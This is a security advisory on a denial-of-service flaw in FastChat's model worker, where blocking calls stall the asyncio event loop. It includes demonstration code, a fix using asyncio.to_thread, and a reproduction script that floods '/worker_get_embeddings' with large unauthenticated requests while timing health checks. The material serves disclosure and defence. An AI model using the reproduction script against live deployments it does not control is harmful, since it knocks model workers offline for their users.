lm-sys FastChat Denial-of-Service Vulnerability in Worker API Endpoint

Vulnerability

A denial-of-service vulnerability has been identified in lm-sys FastChat versions through 0.2.36. The issue lies in the Worker API Endpoint, specifically in the 'api_generate' and 'api_get_embeddings' functions. These endpoints are part of the FastAPI application and are intended to be non-blocking. However, they execute synchronous, resource-intensive tasks, such as GPU inference and network requests to the Hugging Face Inference API, directly on the main event loop thread. While such a task runs, the asyncio event loop is frozen: the server cannot process concurrent requests or respond to health checks. The affected model worker therefore stays unresponsive for the duration of the blocked operation, which can range from several seconds to minutes depending on the task.
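
The blocking pattern described above can be illustrated without FastChat. The following is a minimal sketch, assuming that 'time.sleep' stands in for the synchronous inference or HTTP call; the names 'blocking_inference', 'handler' and 'heartbeat_delay' are hypothetical and are not taken from the FastChat code base.

```python
import asyncio
import time


def blocking_inference(seconds: float) -> str:
    """Hypothetical stand-in for a synchronous GPU or HTTP call."""
    time.sleep(seconds)
    return "done"


async def handler(seconds: float) -> str:
    # Vulnerable pattern: a synchronous call inside an async function
    # runs on the event loop thread and stalls every other task.
    return blocking_inference(seconds)


async def heartbeat_delay(block_seconds: float) -> float:
    """Return how long a 10 ms timer takes to fire while handler() runs."""
    loop = asyncio.get_running_loop()
    start = loop.time()

    async def heartbeat() -> float:
        await asyncio.sleep(0.01)
        return loop.time() - start

    hb = asyncio.create_task(heartbeat())
    await asyncio.sleep(0)  # yield once so the heartbeat can arm its timer
    await handler(block_seconds)
    return await hb
```

Running 'asyncio.run(heartbeat_delay(0.3))' returns a value of roughly 0.3 seconds rather than 0.01, because the timer cannot fire until the blocking call hands control back to the loop.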

Impact

Exploitation of this vulnerability freezes the affected model worker completely: concurrent requests queue up and are not processed until the blocking call returns. The blockage also disrupts heartbeat responses to the controller, which can eventually deregister the worker and make all models on that worker unavailable. In deployments using 'multi_model_worker', the denial-of-service effect cascades across all models served by the worker.

Reproduction

The vulnerability can be reproduced by sending an unauthenticated POST request to the '/worker_get_embeddings' endpoint and performing a health check while that request is in flight. The health check is delayed significantly, which demonstrates that the event loop is blocked. This can be automated with a script that sends the blocking request and then checks the worker status.
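
A reproduction script along these lines could look as follows. It is a sketch only, intended for a test deployment you control. The worker address, the '/worker_get_status' route used as the health check, and the shape of the embeddings payload are all assumptions that should be checked against the deployment; only '/worker_get_embeddings' comes from the description above.

```python
import json
import threading
import time
import urllib.request

WORKER_URL = "http://localhost:21002"  # assumption: adjust to the deployment
STATUS_PATH = "/worker_get_status"     # assumption: route used as health check


def post_json(url: str, payload: dict, timeout: float = 300.0) -> bytes:
    """Send an unauthenticated JSON POST and return the raw response body."""
    req = urllib.request.Request(
        url,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def timed(fn) -> float:
    """Return the wall-clock seconds that fn() takes."""
    start = time.monotonic()
    fn()
    return time.monotonic() - start


def measure(send_blocking, check_health, head_start: float = 0.5):
    """Return (idle, under_load) health-check latency in seconds."""
    idle = timed(check_health)
    worker = threading.Thread(target=send_blocking, daemon=True)
    worker.start()
    time.sleep(head_start)  # let the blocking request reach the worker
    under_load = timed(check_health)
    worker.join()
    return idle, under_load


def main() -> None:
    # Assumed payload shape: a batch of long inputs to keep the worker busy.
    payload = {"input": ["some long text " * 200] * 32}
    idle, under_load = measure(
        lambda: post_json(WORKER_URL + "/worker_get_embeddings", payload),
        lambda: post_json(WORKER_URL + STATUS_PATH, {}),
    )
    print(f"health check: {idle:.2f}s idle, {under_load:.2f}s under load")
```

Calling 'main()' against a vulnerable worker should print an under-load latency close to the duration of the embeddings request, while a patched worker should answer the health check in roughly the idle time.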

Remediation

Users are advised to update to the patched version of FastChat, which addresses this vulnerability by wrapping the blocking calls in 'asyncio.to_thread()' so that they run in a separate thread and no longer freeze the event loop.
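
The effect of this kind of fix can be sketched in isolation. The example below assumes Python 3.9 or later (where 'asyncio.to_thread' is available) and uses 'time.sleep' as a stand-in for the blocking work; 'blocking_inference', 'patched_handler' and 'heartbeat_delay' are hypothetical names, not the actual FastChat patch.

```python
import asyncio
import time


def blocking_inference(seconds: float) -> str:
    """Hypothetical stand-in for a synchronous GPU or HTTP call."""
    time.sleep(seconds)
    return "done"


async def patched_handler(seconds: float) -> str:
    # The blocking call runs in a worker thread from the default executor,
    # so the event loop thread stays free to serve other requests.
    return await asyncio.to_thread(blocking_inference, seconds)


async def heartbeat_delay(block_seconds: float) -> float:
    """Return how long a 10 ms timer takes to fire while the handler runs."""
    loop = asyncio.get_running_loop()
    start = loop.time()

    async def heartbeat() -> float:
        await asyncio.sleep(0.01)
        return loop.time() - start

    hb = asyncio.create_task(heartbeat())
    await patched_handler(block_seconds)
    return await hb
```

With the call offloaded, 'asyncio.run(heartbeat_delay(0.5))' returns a value close to 0.01 seconds even though the handler itself takes half a second, which is the behavior a health check needs.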

Added: Apr 20, 2026, 5:19 AM
Updated: Apr 20, 2026, 5:19 AM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 2.5
exploitability: 8.7
remediation: 0.0
relevance: 6.2
threat: 6.4
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.